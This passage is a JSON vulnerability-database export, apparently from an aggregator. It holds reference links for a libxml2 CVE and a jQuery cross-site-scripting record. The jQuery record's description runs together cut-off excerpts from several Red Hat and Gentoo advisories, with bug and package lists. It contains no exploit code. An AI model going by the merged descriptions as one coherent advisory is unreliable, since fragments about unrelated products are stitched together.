{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3518"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3516"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3580"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-36084"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-24370"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3712"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20231"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-22898"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14155"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3200"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-33560"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:1081"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-18218"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33560"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3445"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-16135"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12762"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-36085"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-20838"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-13750"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-24370"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-42574"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-13750"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-36086"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-28153"
},
{
"trust": 0.1,
"url": "https://open-policy-agent.github.io/gatekeeper/website/docs/howto/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3200"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17595"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-13435"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-17595"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20838"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-19603"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-22925"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-28153"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-13751"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22925"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-5827"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-17594"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-13435"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-36084"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-16135"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3521"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3445"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14155"
},
{
"trust": 0.1,
"url": "https://catalog.redhat.com/software/containers/rhacm2/gatekeeper-rhel8/5fadb4a18d9a79d2f438a5d9."
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20232"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-22876"
},
{
"trust": 0.1,
"url": "https://open-policy-agent.github.io/gatekeeper/website/docs/howto/."
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-36087"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-43565"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17594"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20231"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20232"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22898"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-19603"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-12762"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-18218"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22876"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3521"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3800"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-5827"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-13751"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-23806"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3580"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/libxml2/2.9.12+dfsg-4ubuntu0.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/libxml2/2.9.4+dfsg1-6.1ubuntu1.5"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-5324-1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/libxml2/2.9.10+dfsg-5ubuntu0.20.04.2"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-412332"
},
{
"db": "VULMON",
"id": "CVE-2022-23308"
},
{
"db": "PACKETSTORM",
"id": "168719"
},
{
"db": "PACKETSTORM",
"id": "167185"
},
{
"db": "PACKETSTORM",
"id": "166327"
},
{
"db": "PACKETSTORM",
"id": "166437"
},
{
"db": "PACKETSTORM",
"id": "166805"
},
{
"db": "PACKETSTORM",
"id": "166489"
},
{
"db": "PACKETSTORM",
"id": "166304"
},
{
"db": "CNNVD",
"id": "CNNVD-202202-1722"
},
{
"db": "NVD",
"id": "CVE-2022-23308"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-412332",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2022-23308",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "168719",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "167185",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "166327",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "166437",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "166805",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "166489",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "166304",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-202202-1722",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2022-23308",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2022-02-26T00:00:00",
"db": "VULHUB",
"id": "VHN-412332",
"ident": null
},
{
"date": "2022-02-26T00:00:00",
"db": "VULMON",
"id": "CVE-2022-23308",
"ident": null
},
{
"date": "2022-10-17T13:50:28",
"db": "PACKETSTORM",
"id": "168719",
"ident": null
},
{
"date": "2022-05-17T16:57:57",
"db": "PACKETSTORM",
"id": "167185",
"ident": null
},
{
"date": "2022-03-16T16:44:24",
"db": "PACKETSTORM",
"id": "166327",
"ident": null
},
{
"date": "2022-03-24T14:40:17",
"db": "PACKETSTORM",
"id": "166437",
"ident": null
},
{
"date": "2022-04-21T15:10:14",
"db": "PACKETSTORM",
"id": "166805",
"ident": null
},
{
"date": "2022-03-28T15:52:16",
"db": "PACKETSTORM",
"id": "166489",
"ident": null
},
{
"date": "2022-03-14T18:59:28",
"db": "PACKETSTORM",
"id": "166304",
"ident": null
},
{
"date": "2022-02-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202202-1722",
"ident": null
},
{
"date": "2022-02-26T05:15:08.280000",
"db": "NVD",
"id": "CVE-2022-23308",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2022-11-02T00:00:00",
"db": "VULHUB",
"id": "VHN-412332",
"ident": null
},
{
"date": "2023-11-07T00:00:00",
"db": "VULMON",
"id": "CVE-2022-23308",
"ident": null
},
{
"date": "2023-06-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202202-1722",
"ident": null
},
{
"date": "2025-05-05T17:17:56.523000",
"db": "NVD",
"id": "CVE-2022-23308",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202202-1722"
}
],
"trust": 0.6
},
"title": {
"_id": null,
"data": "libxml2 Resource Management Error Vulnerability",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202202-1722"
}
],
"trust": 0.6
},
"type": {
"_id": null,
"data": "resource management error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202202-1722"
}
],
"trust": 0.6
}
}
VAR-202004-2191
Vulnerability from variot - Updated: 2026-03-09 21:54In jQuery versions greater than or equal to 1.2 and before 3.5.0, passing HTML from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0. jQuery Exists in a cross-site scripting vulnerability.Information may be obtained and information may be tampered with. jQuery is an open source, cross-browser JavaScript library developed by American John Resig programmers. The library simplifies the operation between HTML and JavaScript, and has the characteristics of modularization and plug-in extension. The vulnerability stems from the lack of correct validation of client data in WEB applications. An attacker could exploit this vulnerability to execute client code. 8) - aarch64, noarch, ppc64le, s390x, x86_64
- Description:
The Public Key Infrastructure (PKI) Core contains fundamental packages required by Red Hat Certificate System.
Additional Changes:
For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.3 Release Notes linked from the References section. Bugs fixed (https://bugzilla.redhat.com/):
1376706 - restore SerialNumber tag in caManualRenewal xml 1399546 - CVE-2015-9251 jquery: Cross-site scripting via cross-domain ajax requests 1406505 - KRA ECC installation failed with shared tomcat 1601614 - CVE-2018-14040 bootstrap: Cross-site Scripting (XSS) in the collapse data-parent attribute 1601617 - CVE-2018-14042 bootstrap: Cross-site Scripting (XSS) in the data-container property of tooltip 1666907 - CC: Enable AIA OCSP cert checking for entire cert chain 1668097 - CVE-2016-10735 bootstrap: XSS in the data-target attribute 1686454 - CVE-2019-8331 bootstrap: XSS in the tooltip or popover data-template attribute 1695901 - CVE-2019-10179 pki-core/pki-kra: Reflected XSS in recoveryID search field at KRA's DRM agent page in authorize recovery tab 1701972 - CVE-2019-11358 jquery: Prototype pollution in object's prototype leading to denial of service, remote code execution, or property injection 1706521 - CA - SubjectAltNameExtInput does not display text fields to the enrollment page 1710171 - CVE-2019-10146 pki-core: Reflected XSS in 'path length' constraint field in CA's Agent page 1721684 - Rebase pki-servlet-engine to 9.0.30 1724433 - caTransportCert.cfg contains MD2/MD5withRSA as signingAlgsAllowed. 1732565 - CVE-2019-10221 pki-core: Reflected XSS in getcookies?url= endpoint in CA 1732981 - When nuxwdog is enabled pkidaemon status shows instances as stopped. 1777579 - CVE-2020-1721 pki-core: KRA vulnerable to reflected XSS via the getPk12 page 1805541 - [RFE] CA Certificate Transparency with Embedded Signed Certificate Time stamp 1817247 - Upgrade to 10.8.3 breaks PKI Tomcat Server 1821851 - [RFE] Provide SSLEngine via JSSProvider for use with PKI 1822246 - JSS - NativeProxy never calls releaseNativeResources - Memory Leak 1824939 - JSS: add RSA PSS support - RHEL 8.3 1824948 - add RSA PSS support - RHEL 8.3 1825998 - CertificatePoliciesExtDefault MAX_NUM_POLICIES hardcoded limit 1828406 - CVE-2020-11022 jquery: Cross-site scripting due to improper injQuery.htmlPrefilter method 1842734 - CVE-2019-10179 pki-core: pki-core/pki-kra: Reflected XSS in recoveryID search field at KRA's DRM agent page in authorize recovery tab [rhel-8] 1842736 - CVE-2019-10146 pki-core: Reflected Cross-Site Scripting in 'path length' constraint field in CA's Agent page [rhel-8] 1843537 - Able to Perform PKI CLI operations like cert request and approval without nssdb password 1845447 - pkispawn fails in FIPS mode: AJP connector has secretRequired="true" but no secret 1850004 - CVE-2020-11023 jquery: Passing HTML containing elements to manipulation methods could result in untrusted code execution 1854043 - /usr/bin/PrettyPrintCert is failing with a ClassNotFoundException 1854959 - ca-profile-add with Netscape extensions nsCertSSLClient and nsCertEmail in the profile gets stuck in processing 1855273 - CVE-2020-15720 pki: Dogtag's python client does not validate certificates 1855319 - Not able to launch pkiconsole 1856368 - kra-key-generate request is failing 1857933 - CA Installation is failing with ncipher v12.30 HSM 1861911 - pki cli ca-cert-request-approve hangs over crmf request from client-cert-request 1869893 - Common certificates are missing in CS.cfg on shared PKI instance 1871064 - replica install failing during pki-ca component configuration 1873235 - pki ca-user-cert-add with secure port failed with 'SSL_ERROR_INAPPROPRIATE_FALLBACK_ALERT'
- You can also manage user accounts for web applications, mobile applications, and RESTful web services. Description:
Red Hat Single Sign-On 7.6 is a standalone server, based on the Keycloak project, that provides authentication and standards-based single sign-on capabilities for web and mobile applications. Description:
Red Hat Identity Management (IdM) is a centralized authentication, identity management, and authorization solution for both traditional and cloud-based enterprise environments. Bugs fixed (https://bugzilla.redhat.com/):
1399546 - CVE-2015-9251 jquery: Cross-site scripting via cross-domain ajax requests 1430365 - [RFE] Host-group names command rename 1488732 - fake_mname in named.conf is no longer effective 1585020 - Enable compat tree to provide information about AD users and groups on trust agents 1601614 - CVE-2018-14040 bootstrap: Cross-site Scripting (XSS) in the collapse data-parent attribute 1601617 - CVE-2018-14042 bootstrap: Cross-site Scripting (XSS) in the data-container property of tooltip 1651577 - [WebUI] IPA Error 3007: RequirmentError" while adding members in "User ID overrides" tab 1668082 - CVE-2018-20676 bootstrap: XSS in the tooltip data-viewport attribute 1668089 - CVE-2018-20677 bootstrap: XSS in the affix configuration target property 1668097 - CVE-2016-10735 bootstrap: XSS in the data-target attribute 1686454 - CVE-2019-8331 bootstrap: XSS in the tooltip or popover data-template attribute 1701233 - [RFE] support setting supported signature methods on the token 1701972 - CVE-2019-11358 jquery: Prototype pollution in object's prototype leading to denial of service, remote code execution, or property injection 1746830 - Memory leak during search of idview overrides 1750893 - Memory leak when slapi-nis return entries retrieved from nsswitch 1751295 - When sync-repl is enabled, slapi-nis can deadlock during retrochanglog trimming 1757045 - IDM Web GUI / IPA web UI: the ID override operation doesn't work in GUI (it works only from CLI) 1759888 - Rebase OpenDNSSEC to 2.1 1768156 - ERR - schemacompat - map rdlock: old way MAP_MONITOR_DISABLED 1777806 - When Service weight is set as 0 for server in IPA location "IPA Error 903: InternalError" is displayed 1793071 - CVE-2020-1722 ipa: No password length restriction leads to denial of service 1801698 - [RFE] Changing default hostgroup is too easy 1802471 - SELinux policy for ipa-custodia 1809835 - RFE: ipa group-add-member: number of failed should also be emphasized 1810154 - RFE: ipa-backup should compare locally and globally installed server roles 1810179 - ipa-client-install should name authselect backups and restore to that at uninstall time 1813330 - ipa-restore does not restart httpd 1816784 - KRA install fails if all KRA members are Hidden Replicas 1818765 - [Rebase] Rebase ipa to 4.8.6+ 1818877 - [Rebase] Rebase to softhsm 2.6.0+ 1828406 - CVE-2020-11022 jquery: Cross-site scripting due to improper injQuery.htmlPrefilter method 1831732 - AVC avc: denied { dac_override } for comm="ods-enforcerd 1831935 - AD authentication with IdM against SQL Server 1832331 - [abrt] [faf] 389-ds-base: unknown function(): /usr/sbin/ns-slapd killed by 11 1833266 - [dirsrv] set 'nsslapd-enable-upgrade-hash: off' as this raises warnings 1834264 - BIND rebase: rebuild against new so version 1834909 - softhsm use-after-free on process exit 1845211 - Rebase bind-dyndb-ldap to 11.3 1845537 - IPA bind configuration issue 1845596 - ipa trust-add fails with 'Fetching domains from trusted forest failed' 1846352 - cannot issue certs with multiple IP addresses corresponding to different hosts 1846434 - Remove ipa-idoverride-memberof as superceded by ipa-server 4.8.7 1847999 - EPN does not ship its default configuration ( /etc/ipa/epn.conf ) in freeipa-client-epn 1849914 - FreeIPA - Utilize 256-bit AJP connector passwords 1851411 - ipa: typo issue in ipanthomedirectoryrive deffinition 1852244 - ipa-healthcheck inadvertently obsoleted in RHEL 8.2 1853263 - ipa-selinux package missing 1857157 - replica install failing with avc denial for custodia component 1858318 - AttributeError: module 'ssl' has no attribute 'SSLCertVerificationError' when upgrading ca-less ipa master 1859213 - AVC denial during ipa-adtrust-install --add-agents 1863079 - ipa-epn command displays 'exception: ConnectionRefusedError: [Errno 111] Connection refused' 1863616 - CA-less install does not set required permissions on KDC certificate 1866291 - EPN: enhance input validation 1866938 - ipa-epn fails to retrieve user data if some user attributes are not present 1868432 - Unhandled Python exception in '/usr/libexec/ipa/ipa-pki-retrieve-key' 1869311 - ipa trust-add fails with 'Fetching domains from trusted forest failed' 1870202 - File permissions of /etc/ipa/ca.crt differ between CA-ful and CA-less 1874015 - ipa hbacrule-add-service --hbacsvcs=sshd is not applied successfully for subdomain 1875348 - Valgrind reports a memory leak in the Schema Compatibility plugin. 1879604 - pkispawn logs files are empty
-
Gentoo Linux Security Advisory GLSA 202007-03
https://security.gentoo.org/ <https://security.gentoo.org/>
Severity: Normal Title: Cacti: Multiple vulnerabilities Date: July 26, 2020 Bugs: #728678, #732522 ID: 202007-03
Synopsis
Multiple vulnerabilities have been found in Cacti, the worst of which could result in the arbitrary execution of code.
Background
Cacti is a complete frontend to rrdtool.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-analyzer/cacti < 1.2.13 >= 1.2.13 2 net-analyzer/cacti-spine < 1.2.13 >= 1.2.13 ------------------------------------------------------------------- 2 affected packages
Description
Multiple vulnerabilities have been discovered in Cacti. Please review the CVE identifiers referenced below for details.
Impact
Please review the referenced CVE identifiers for details.
Workaround
There is no known workaround at this time.
Resolution
All Cacti users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=net-analyzer/cacti-1.2.13"
All Cacti Spine users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot -v ">=net-analyzer/cacti-spine-1.2.13"
References
[ 1 ] CVE-2020-11022 https://nvd.nist.gov/vuln/detail/CVE-2020-11022 https://nvd.nist.gov/vuln/detail/CVE-2020-11022 [ 2 ] CVE-2020-11023 https://nvd.nist.gov/vuln/detail/CVE-2020-11023 https://nvd.nist.gov/vuln/detail/CVE-2020-11023 [ 3 ] CVE-2020-14295 https://nvd.nist.gov/vuln/detail/CVE-2020-14295 https://nvd.nist.gov/vuln/detail/CVE-2020-14295
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/202007-03 https://security.gentoo.org/glsa/202007-03
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org https://bugs.gentoo.org/.
License
Copyright 2020 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
https://creativecommons.org/licenses/by-sa/2.5 https://creativecommons.org/licenses/by-sa/2.5
. Description:
Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. Solution:
Before applying this update, ensure all previously released errata relevant to your system is applied.
See the following documentation, which will be updated shortly for release 3.11.219, for important instructions on how to upgrade your cluster and fully apply this asynchronous errata update:
https://docs.openshift.com/container-platform/3.11/release_notes/ocp_3_11_r elease_notes.html
This update is available via the Red Hat Network. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Moderate: Red Hat Virtualization security, bug fix, and enhancement update Advisory ID: RHSA-2020:3807-01 Product: Red Hat Virtualization Advisory URL: https://access.redhat.com/errata/RHSA-2020:3807 Issue date: 2020-09-23 CVE Names: CVE-2020-8203 CVE-2020-11022 CVE-2020-11023 CVE-2020-14333 ==================================================================== 1. Summary:
An update is now available for Red Hat Virtualization Engine 4.4.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4 - noarch
- Description:
The org.ovirt.engine-root is a core component of oVirt.
The following packages have been upgraded to a later upstream version: ansible-runner-service (1.0.5), org.ovirt.engine-root (4.4.2.3), ovirt-engine-dwh (4.4.2.1), ovirt-engine-extension-aaa-ldap (1.4.1), ovirt-engine-ui-extensions (1.2.3), ovirt-log-collector (4.4.3), ovirt-web-ui (1.6.4), rhvm-branding-rhv (4.4.5), rhvm-dependencies (4.4.1), vdsm-jsonrpc-java (1.5.5). (BZ#1674420, BZ#1866734)
A list of bugs fixed in this update is available in the Technical Notes book:
https://access.redhat.com/documentation/en-us/red_hat_virtualization/4.4/ht ml-single/technical_notes
Security Fix(es):
-
nodejs-lodash: prototype pollution in zipObjectDeep function (CVE-2020-8203)
-
jquery: Cross-site scripting due to improper injQuery.htmlPrefilter method (CVE-2020-11022)
-
jQuery: passing HTML containing elements to manipulation methods could result in untrusted code execution (CVE-2020-11023)
-
ovirt-engine: Reflected cross site scripting vulnerability (CVE-2020-14333)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Bug Fix(es):
-
Cannot assign direct LUN from FC storage - grayed out (BZ#1625499)
-
VM portal always asks how to open console.vv even it has been set to default application. (BZ#1638217)
-
RESTAPI Not able to remove the QoS from a disk profile (BZ#1643520)
-
On OVA import, qemu-img fails to write to NFS storage domain (BZ#1748879)
-
Possible missing block path for a SCSI host device needs to be handled in the UI (BZ#1801206)
-
Scheduling Memory calculation disregards huge-pages (BZ#1804037)
-
Engine does not reduce scheduling memory when a VM with dynamic hugepages runs. (BZ#1804046)
-
In Admin Portal, "Huge Pages (size: amount)" needs to be clarified (BZ#1806339)
-
Refresh LUN is using host from different Data Center to scan the LUN (BZ#1838051)
-
Unable to create Windows VM's with Mozilla Firefox version 74.0.1 and greater for RHV-M GUI/Webadmin portal (BZ#1843234)
-
[RHV-CNV] - NPE when creating new VM in cnv cluster (BZ#1854488)
-
[CNV&RHV] Add-Disk operation failed to complete. (BZ#1855377)
-
Cannot create KubeVirt VM as a normal user (BZ#1859460)
-
Welcome page - remove Metrics Store links and update "Insights Guide" link (BZ#1866466)
-
[RHV 4.4] Change in CPU model name after RHVH upgrade (BZ#1869209)
-
VM vm-name is down with error. Exit message: unsupported configuration: Can't add USB input device. USB bus is disabled. (BZ#1871235)
-
spec_ctrl host feature not detected (BZ#1875609)
Enhancement(s):
-
[RFE] API for changed blocks/sectors for a disk for incremental backup usage (BZ#1139877)
-
[RFE] Improve workflow for storage migration of VMs with multiple disks (BZ#1749803)
-
[RFE] Move the Remove VM button to the drop down menu when viewing details such as snapshots (BZ#1763812)
-
[RFE] enhance search filter for Storage Domains with free argument (BZ#1819260)
-
Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/2974891
- Bugs fixed (https://bugzilla.redhat.com/):
1625499 - Cannot assign direct LUN from FC storage - grayed out 1638217 - VM portal always asks how to open console.vv even it has been set to default application. 1643520 - RESTAPI Not able to remove the QoS from a disk profile 1674420 - [RFE] - add support for Cascadelake-Server CPUs (and IvyBridge) 1748879 - On OVA import, qemu-img fails to write to NFS storage domain 1749803 - [RFE] Improve workflow for storage migration of VMs with multiple disks 1758024 - Long running Ansible tasks timeout and abort for RHV-H hosts with STIG/Security Profiles applied 1763812 - [RFE] Move the Remove VM button to the drop down menu when viewing details such as snapshots 1778471 - Using more than one asterisk in LDAP search string is not working when searching for AD users. 1787854 - RHV: Updating/reinstall a host which is part of affinity labels is removed from the affinity label. 1801206 - Possible missing block path for a SCSI host device needs to be handled in the UI 1803856 - [Scale] ovirt-vmconsole takes too long or times out in a 500+ VM environment. 1804037 - Scheduling Memory calculation disregards huge-pages 1804046 - Engine does not reduce scheduling memory when a VM with dynamic hugepages runs. 1806339 - In Admin Portal, "Huge Pages (size: amount)" needs to be clarified 1816951 - [CNV&RHV] CNV VM migration failure is not handled correctly by the engine 1819260 - [RFE] enhance search filter for Storage Domains with free argument 1826255 - [CNV&RHV]Change name of type of provider - CNV -> OpenShift Virtualization 1828406 - CVE-2020-11022 jquery: Cross-site scripting due to improper injQuery.htmlPrefilter method 1831949 - RESTAPI javadoc contains missing information about assigning IP address to NIC 1831952 - RESTAPI contains malformed link around JSON representation fo the cluster 1831954 - RESTAPI javadoc contains malformed link around oVirt guest agent 1831956 - RESTAPI javadoc contains malformed link around time zone representation 1838051 - Refresh LUN is using host from different Data Center to scan the LUN 1841112 - not able to upload vm from OVA when there are 2 OVA from the same vm in same directory 1843234 - Unable to create Windows VM's with Mozilla Firefox version 74.0.1 and greater for RHV-M GUI/Webadmin portal 1850004 - CVE-2020-11023 jQuery: passing HTML containing elements to manipulation methods could result in untrusted code execution 1854488 - [RHV-CNV] - NPE when creating new VM in cnv cluster 1855377 - [CNV&RHV] Add-Disk operation failed to complete. 1857412 - CVE-2020-8203 nodejs-lodash: prototype pollution in zipObjectDeep function 1858184 - CVE-2020-14333 ovirt-engine: Reflected cross site scripting vulnerability 1859460 - Cannot create KubeVirt VM as a normal user 1860907 - Upgrade bundled GWT to 2.9.0 1866466 - Welcome page - remove Metrics Store links and update "Insights Guide" link 1866734 - [DWH] Rebase bug - for the 4.4.2 release 1869209 - [RHV 4.4] Change in CPU model name after RHVH upgrade 1869302 - ansible 2.9.12 - host deploy fixes 1871235 - VM vm-name is down with error. Exit message: unsupported configuration: Can't add USB input device. USB bus is disabled. 1875609 - spec_ctrl host feature not detected 1875851 - Web Admin interface broken on Firefox ESR 68.11
- Package List:
RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4:
Source: ansible-runner-service-1.0.5-1.el8ev.src.rpm ovirt-engine-4.4.2.3-0.6.el8ev.src.rpm ovirt-engine-dwh-4.4.2.1-1.el8ev.src.rpm ovirt-engine-extension-aaa-ldap-1.4.1-1.el8ev.src.rpm ovirt-engine-ui-extensions-1.2.3-1.el8ev.src.rpm ovirt-log-collector-4.4.3-1.el8ev.src.rpm ovirt-web-ui-1.6.4-1.el8ev.src.rpm rhvm-branding-rhv-4.4.5-1.el8ev.src.rpm rhvm-dependencies-4.4.1-1.el8ev.src.rpm vdsm-jsonrpc-java-1.5.5-1.el8ev.src.rpm
noarch: ansible-runner-service-1.0.5-1.el8ev.noarch.rpm ovirt-engine-4.4.2.3-0.6.el8ev.noarch.rpm ovirt-engine-backend-4.4.2.3-0.6.el8ev.noarch.rpm ovirt-engine-dbscripts-4.4.2.3-0.6.el8ev.noarch.rpm ovirt-engine-dwh-4.4.2.1-1.el8ev.noarch.rpm ovirt-engine-dwh-grafana-integration-setup-4.4.2.1-1.el8ev.noarch.rpm ovirt-engine-dwh-setup-4.4.2.1-1.el8ev.noarch.rpm ovirt-engine-extension-aaa-ldap-1.4.1-1.el8ev.noarch.rpm ovirt-engine-extension-aaa-ldap-setup-1.4.1-1.el8ev.noarch.rpm ovirt-engine-health-check-bundler-4.4.2.3-0.6.el8ev.noarch.rpm ovirt-engine-restapi-4.4.2.3-0.6.el8ev.noarch.rpm ovirt-engine-setup-4.4.2.3-0.6.el8ev.noarch.rpm ovirt-engine-setup-base-4.4.2.3-0.6.el8ev.noarch.rpm ovirt-engine-setup-plugin-cinderlib-4.4.2.3-0.6.el8ev.noarch.rpm ovirt-engine-setup-plugin-imageio-4.4.2.3-0.6.el8ev.noarch.rpm ovirt-engine-setup-plugin-ovirt-engine-4.4.2.3-0.6.el8ev.noarch.rpm ovirt-engine-setup-plugin-ovirt-engine-common-4.4.2.3-0.6.el8ev.noarch.rpm ovirt-engine-setup-plugin-vmconsole-proxy-helper-4.4.2.3-0.6.el8ev.noarch.rpm ovirt-engine-setup-plugin-websocket-proxy-4.4.2.3-0.6.el8ev.noarch.rpm ovirt-engine-tools-4.4.2.3-0.6.el8ev.noarch.rpm ovirt-engine-tools-backup-4.4.2.3-0.6.el8ev.noarch.rpm ovirt-engine-ui-extensions-1.2.3-1.el8ev.noarch.rpm ovirt-engine-vmconsole-proxy-helper-4.4.2.3-0.6.el8ev.noarch.rpm ovirt-engine-webadmin-portal-4.4.2.3-0.6.el8ev.noarch.rpm ovirt-engine-websocket-proxy-4.4.2.3-0.6.el8ev.noarch.rpm ovirt-log-collector-4.4.3-1.el8ev.noarch.rpm ovirt-web-ui-1.6.4-1.el8ev.noarch.rpm python3-ovirt-engine-lib-4.4.2.3-0.6.el8ev.noarch.rpm rhvm-4.4.2.3-0.6.el8ev.noarch.rpm rhvm-branding-rhv-4.4.5-1.el8ev.noarch.rpm rhvm-dependencies-4.4.1-1.el8ev.noarch.rpm vdsm-jsonrpc-java-1.5.5-1.el8ev.noarch.rpm
